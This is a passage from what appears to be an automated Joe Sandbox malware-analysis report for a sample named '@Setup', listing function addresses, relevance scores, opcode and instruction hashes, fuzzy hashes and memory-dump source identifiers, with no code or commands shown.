                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                              • API String ID: 0-3993045852
                                                                                                                                                                                              • Opcode ID: 7e9eeca076646084577e87f5d9acb102ddda44551bdeeca6dda54682bffb2a07
                                                                                                                                                                                              • Instruction ID: 22e0bb47eab6048998a382a1359294f5cdd0f86f780b93a85f0d384e6865eaf1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e9eeca076646084577e87f5d9acb102ddda44551bdeeca6dda54682bffb2a07
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D21663675C3505BE314CF659C81B5BB7B2DBC1700F0AC42CA0D99B2C6C9B8D80A8756
                                                                                                                                                                                              Function 0092DD63 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 9.
                                                                                                                                                                                              • API String ID: 0-3220845746
                                                                                                                                                                                              • Opcode ID: 2f0db2e05e433de1ce6d0a08f8de5200b539344b76bcb4890074e0b57ffa2b30
                                                                                                                                                                                              • Instruction ID: dfe36dc2de027f0552014774dcb0385f09cccc81babadf91e6ddf2d6c39ee20b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f0db2e05e433de1ce6d0a08f8de5200b539344b76bcb4890074e0b57ffa2b30
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8114C346456208FDB148F28DC547BEBBF5FB56320F285A2CD851AB2E5C3709C05CB84
                                                                                                                                                                                              Function 009068D4 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: D]+\
                                                                                                                                                                                              • API String ID: 0-1174097187
                                                                                                                                                                                              • Opcode ID: 10b7da352227ad69995a6a93ce2ed4aecaec4f31f23e1732a48b340c8dcc62f9
                                                                                                                                                                                              • Instruction ID: 84c19f7b5bdd73e592775b44696f56f935b45d45590e4b002e0cb1fc8ab4e172
                                                                                                                                                                                              • Opcode Fuzzy Hash: 10b7da352227ad69995a6a93ce2ed4aecaec4f31f23e1732a48b340c8dcc62f9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 35017175A0D240DFC718AF18D98083AB7B1FF9A711F24597CE092965B1D731D826DB06
                                                                                                                                                                                              Function 00909925 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: K
                                                                                                                                                                                              • API String ID: 0-856455061
                                                                                                                                                                                              • Opcode ID: 8d37e6ccbb4f3aa2f241c2daf0d95534b8e8f5badda7f9466af137ddecd97f25
                                                                                                                                                                                              • Instruction ID: cd6488c26de2dcd081672588e24a8e4c4cc782011da4112bda145204e56a4824
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d37e6ccbb4f3aa2f241c2daf0d95534b8e8f5badda7f9466af137ddecd97f25
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8001D42461C3824BEB18CB3998603F7BBD29BD3310F28997DC0D2D7286DA39C542C716
                                                                                                                                                                                              Function 0092D3E2 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 0-3019521637
                                                                                                                                                                                              • Opcode ID: 6d2294f8cacab3f0f970d0ee1678d9506feb83dbf5f0a7d4737b5ff95201ad51
                                                                                                                                                                                              • Instruction ID: 78812db52ad2a5c7b080ba5e821b8d3ff413155d2b1af0033454663513430f57
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d2294f8cacab3f0f970d0ee1678d9506feb83dbf5f0a7d4737b5ff95201ad51
                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F068246149544FEBE18F7CA4593BE6BF0E717214F242DB8C64EE32E5D92498814B0C
                                                                                                                                                                                              Function 008F7E2E Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: debe3aa54478002ff5fc8390f08f26bc0bdd7817bab62852bddf283ee8947fc6
                                                                                                                                                                                              • Instruction ID: d32c79b170c7e4803d5aa56a85a6b0619e82ae8af1fa99588fafeb415045876c
                                                                                                                                                                                              • Opcode Fuzzy Hash: debe3aa54478002ff5fc8390f08f26bc0bdd7817bab62852bddf283ee8947fc6
                                                                                                                                                                                              • Instruction Fuzzy Hash: E752C570908B88CFEB35CB34C4583B7BBE1FB91314F54482EC6E686682CB79A985C755
                                                                                                                                                                                              Function 008F8C0E Relevance: .7, Instructions: 664COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
                                                                                                                                                                                              • Instruction ID: 508b19139e181893988d39748279e67436556b7d1ab44f64e279fa509d043ffd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
                                                                                                                                                                                              • Instruction Fuzzy Hash: FB22C3316087198BC7259F28D9407BBB3E2FFD4319F29492DDAC6C7281DB34A855CB86
                                                                                                                                                                                              Function 008F512E Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 330cdb504d0581177fee4162548ce1b038345f9227f4fbf34d975ef9116b19f5
                                                                                                                                                                                              • Instruction ID: c96a56b94feb4e5e2517dcffb8c330eb0d92d994e07453bc255b1550b14cbd47
                                                                                                                                                                                              • Opcode Fuzzy Hash: 330cdb504d0581177fee4162548ce1b038345f9227f4fbf34d975ef9116b19f5
                                                                                                                                                                                              • Instruction Fuzzy Hash: E232FFB0915F188FC368CF29C59052ABBF1FB55710BA04A2ED7A787E90D736B885CB14
                                                                                                                                                                                              Function 00910ECE Relevance: .6, Instructions: 589COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2bd47799eb57059bfe57c26463fa04caf668ca9dba0e1477c355565c8a3a22bb
                                                                                                                                                                                              • Instruction ID: 2e1ccf3d609932aa41d7a9b29a843ff90cf50ecc03f44fc5b4f53b9613f0d3bf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bd47799eb57059bfe57c26463fa04caf668ca9dba0e1477c355565c8a3a22bb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B525BB0619B818ED325CB3C8815797BFE5AB9A324F184A5DE0EF873D2C7756001CB66
                                                                                                                                                                                              Function 00928F5E Relevance: .5, Instructions: 506COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 75d0d20039ea909b85a084289a16d68fe75e8375b8f3326ba79df7c5e0795268
                                                                                                                                                                                              • Instruction ID: a1f59603c9baac14b31002d9919e76e99818e58db20e9ab519cd564f09d319f2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 75d0d20039ea909b85a084289a16d68fe75e8375b8f3326ba79df7c5e0795268
                                                                                                                                                                                              • Instruction Fuzzy Hash: EEE136326083218BC724DF24E89166FB7E6FBC5304F29892CE89597259DB75EC06C791
                                                                                                                                                                                              Function 0091388E Relevance: .4, Instructions: 416COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cc4ce578f6c75970c38f5fe7feba3d410f88a8e8080f5f57d469e391479e5d57
                                                                                                                                                                                              • Instruction ID: c3ee37c7f69f049ad9c452f8dc2054ef37eece510307beb364a35e9ee7349701
                                                                                                                                                                                              • Opcode Fuzzy Hash: cc4ce578f6c75970c38f5fe7feba3d410f88a8e8080f5f57d469e391479e5d57
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27A1F6B1A493149BD7209F29C8516BBB3F5EF91320F18C92CE8CA97281E774DA85C752
                                                                                                                                                                                              Function 008F713E Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 44ce7279b56fa8169ec13a13368719194771adb87650b2a041a7c66ca29ffa36
                                                                                                                                                                                              • Instruction ID: 770c14878fe7221067ecbc5c181d2f4f1cd00da4399d8359c34c7937dcfbe034
                                                                                                                                                                                              • Opcode Fuzzy Hash: 44ce7279b56fa8169ec13a13368719194771adb87650b2a041a7c66ca29ffa36
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BE1567120C3499FD721DF69C880A6BBBE5FF98300F44882DE9D987751E275E948CB92
                                                                                                                                                                                              Function 009179FE Relevance: .4, Instructions: 389COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d4695906570af46ad0eb9b8773b14a5986ede78b51dae6fc9cb65d7ed68fe73b
                                                                                                                                                                                              • Instruction ID: b8a3222ec54abf4c207433e2dd3cbf1545c07e5064c45506d52f558b33aeacc8
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4695906570af46ad0eb9b8773b14a5986ede78b51dae6fc9cb65d7ed68fe73b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB14671B4C31A4BD7149FA488826BBF7F5EF99300F29896CE48687381D639DC45C792
                                                                                                                                                                                              Function 0090621E Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 05141268d55921b9efb15025b2a1370daa90e9d9ed9dafacc1d1fcf6f45c65af
                                                                                                                                                                                              • Instruction ID: 2019a9e9fce949046b436cfe28889a146726187af1a91f600c01433199a4aad9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 05141268d55921b9efb15025b2a1370daa90e9d9ed9dafacc1d1fcf6f45c65af
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E8135B69543148BC7209F68CC92267B3A1EFD1320F0D862DDCE98B3D1F7B899458751
                                                                                                                                                                                              Function 009134DE Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a7e631f70cfeebc1df7f27ebd76b344da72dba221058e9e6e75dba537abe2d38
                                                                                                                                                                                              • Instruction ID: 471483b3298a403e911aa2d02297cdd99da280a2054f2896499517a96f26d3f8
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7e631f70cfeebc1df7f27ebd76b344da72dba221058e9e6e75dba537abe2d38
                                                                                                                                                                                              • Instruction Fuzzy Hash: F4A113B1A043059BD724DF24C892BA7B7B5EFC0364F18892CF98A8B391E774D945CB52
                                                                                                                                                                                              Function 0090F00E Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 63f7f23a3844ce791695e6eee4ef3e65379e9f52cc760aa8cca2b3a45a1be140
                                                                                                                                                                                              • Instruction ID: f49cbaf97feaa14da02f28b1019170c8de821a2e3f9ef6c968a0b0acdd5b354d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63f7f23a3844ce791695e6eee4ef3e65379e9f52cc760aa8cca2b3a45a1be140
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9B1C176608301EFD7609F24DC41B1ABBE1AFD8364F144A3CF4E8966E0D7729D468B42
                                                                                                                                                                                              Function 0092F9BE Relevance: .3, Instructions: 329COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a4d6f9712397e7508911c777de9812b6e64d882a15e45fd0c8ed7c9c5354f2b4
                                                                                                                                                                                              • Instruction ID: 5fc8451f76aa6c1d7e41299da4753a92092dcde643a55a374eb310c254e77719
                                                                                                                                                                                              • Opcode Fuzzy Hash: a4d6f9712397e7508911c777de9812b6e64d882a15e45fd0c8ed7c9c5354f2b4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C91C1756096659BCB24CF18E8A0A6AB3F6FFC8710F15853CE8C587258DB70EC01CB81
                                                                                                                                                                                              Function 0091F791 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ca8d3102f2d7d0810326b730d76ca4776b7366c0eec700305c6cc8618647d351
                                                                                                                                                                                              • Instruction ID: 19f16fce3bd144db878c8fa4c3563f59c66eaf275905ac5335f6d03e3fd2683e
                                                                                                                                                                                              • Opcode Fuzzy Hash: ca8d3102f2d7d0810326b730d76ca4776b7366c0eec700305c6cc8618647d351
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AD1D272609B804BD3198A3888A13A7BFD25BD6324F19CA7DD4EB877D6D578A405C702
                                                                                                                                                                                              Function 0092F67E Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9dfe86e01db615fded3b1a6999251e8f94e711860ff482eaae1eb0032a72c8bb
                                                                                                                                                                                              • Instruction ID: f876fa2b6d871afd48d263b734e347b811ea7c65c02126ba8894fcab5cf39de7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dfe86e01db615fded3b1a6999251e8f94e711860ff482eaae1eb0032a72c8bb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B91C2796052219BC718DF18E9A0A2AB3F6FFD9710F15857CE8868B369DB30EC41CB41
                                                                                                                                                                                              Function 009089D9 Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4d7fe286fe88c55c4d95f7046e949b0e609347145802e131d6884ab40dd08542
                                                                                                                                                                                              • Instruction ID: ace6a12aae724c3ed0463a7f0272cf8f054ba35fc8d25b289510a39e6b126c76
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d7fe286fe88c55c4d95f7046e949b0e609347145802e131d6884ab40dd08542
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2471DF75B092418FE738CF25D882A7BB3A6FBD5300F28987CD5C257696DA30DC068B56
                                                                                                                                                                                              Function 008F799E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
                                                                                                                                                                                              • Instruction ID: bd4a61b2dd037d17d5a78efb264f46584a540d98b43afc392841733197848958
                                                                                                                                                                                              • Opcode Fuzzy Hash: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
                                                                                                                                                                                              • Instruction Fuzzy Hash: 21C15BB29087458FD360CF68CC86BABB7E1FF85318F08492DD2D9C6242E778A155CB46
                                                                                                                                                                                              Function 008F0000 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a4f73b8b930e5ab3a0c41b1e1d253ebc8ed6d5554c9e46f3b30268306d54ef89
                                                                                                                                                                                              • Instruction ID: e5ef046d3e5db595c4fff004bb9103ec3cb1c7810c75975fabcae3135bcdc4e9
                                                                                                                                                                                              • Opcode Fuzzy Hash: a4f73b8b930e5ab3a0c41b1e1d253ebc8ed6d5554c9e46f3b30268306d54ef89
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9613937A547390B6B6ECCBA8C9927E4082A3D02487C7E33DDD67EF589DE25884701C1
                                                                                                                                                                                              Function 0092F37E Relevance: .3, Instructions: 269COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 24c91aacc9be0785a1ade04a120cb2fd53f836276e8d389eeda56f85202df24b
                                                                                                                                                                                              • Instruction ID: 4762f810bacadca0b5c3fe5114bb8dbcc0cb6207fc48e2e20b9534b8cb95b18e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 24c91aacc9be0785a1ade04a120cb2fd53f836276e8d389eeda56f85202df24b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52815976A052249BCB24DF18D890A7BB3B6EFD5710F19C57CE8859B268EB30AD11C781
                                                                                                                                                                                              Function 0090ED2E Relevance: .3, Instructions: 267COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1b2b3dfd705819de440ea8d328ff29dfee81072cb835508420583d96ea5adce8
                                                                                                                                                                                              • Instruction ID: ed2c7b10cb737c3cdeba2bd2f5635d104dc24c1160fd593a2ddfcec8d3dd404f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b2b3dfd705819de440ea8d328ff29dfee81072cb835508420583d96ea5adce8
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA911A73A042614FC7258E28C85139E7BE1EB95320F198A3DE8B99B3D1D7759C06D7C1
                                                                                                                                                                                              Function 008F9EEE Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 37713153fd861fc19c2859b5818cfc8fcd4e9fe6f9192c9618c759a7e7eb14e2
                                                                                                                                                                                              • Instruction ID: 38cdea24607fe61eca1bfe1c5fb3e3fc1333b1ae72ba217618fec054b4349650
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37713153fd861fc19c2859b5818cfc8fcd4e9fe6f9192c9618c759a7e7eb14e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 057158B3E443144BD318AF799C4236AB6C7ABC1710F1F813DA989EB3A5DD758C028292
                                                                                                                                                                                              Function 0092B89E Relevance: .2, Instructions: 229COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
